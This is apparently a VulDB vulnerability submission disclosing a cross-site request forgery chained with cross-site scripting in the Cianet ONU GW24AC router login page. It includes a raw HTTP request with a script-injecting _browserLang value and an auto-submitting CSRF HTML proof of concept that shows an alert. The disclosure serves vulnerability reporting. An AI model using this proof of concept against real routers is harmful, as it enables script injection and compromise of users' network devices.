| 제목 | Cianet ONU GW24AC Cross-Site Request Forgery |
|---|
| 설명 | This vulnerability allows you to take advantage of the browserLang parameter to inject malicious code and use the fact that there is no CSRF token for the login request, allowing you to concatenate the CSRF vulnerability with XSS. To reproduce, simply save the HTML code provided below in a .html file and open it in your browser, which will show the alert prompt as proof of concept.
# Request
POST / HTTP/1.1
Referer: https://x.x.x.x/
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: x.x.x.x
Connection: Keep-alive
Frm_Logintoken=BzenyKyK&Password=u]H[ww6KrA9F.x-F&Username=BzenyKyK&_browserLang=19409"();}]9074"></script></script><script>alert('c4ng4c3ir0')</script>&_lang=1&action=login&frashnum=1
#CSRF HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://x.x.x.x/" method="POST">
<input type="hidden" name="Frm_Logintoken" value="BzenyKyK" />
<input type="hidden" name="Password" value="u]H[ww6KrA9F.x-F" />
<input type="hidden" name="Username" value="BzenyKyK" />
<input type="hidden" name="_browserLang" value="19409"();}]9074"></script></script><script>alert(9)</script>" />
<input type="hidden" name="_lang" value="1" />
<input type="hidden" name="action" value="login" />
<input type="hidden" name="frashnum" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
|---|
| 사용자 | c4ng4c3ir0 (UID 38456) |
|---|
| 제출 | 2025. 01. 27. AM 05:22 (1 년도 ago) |
|---|
| 모더레이션 | 2025. 01. 30. AM 09:29 (3 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 294055 [Cianet ONU GW24AC 까지 20250127 Login browserLang 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|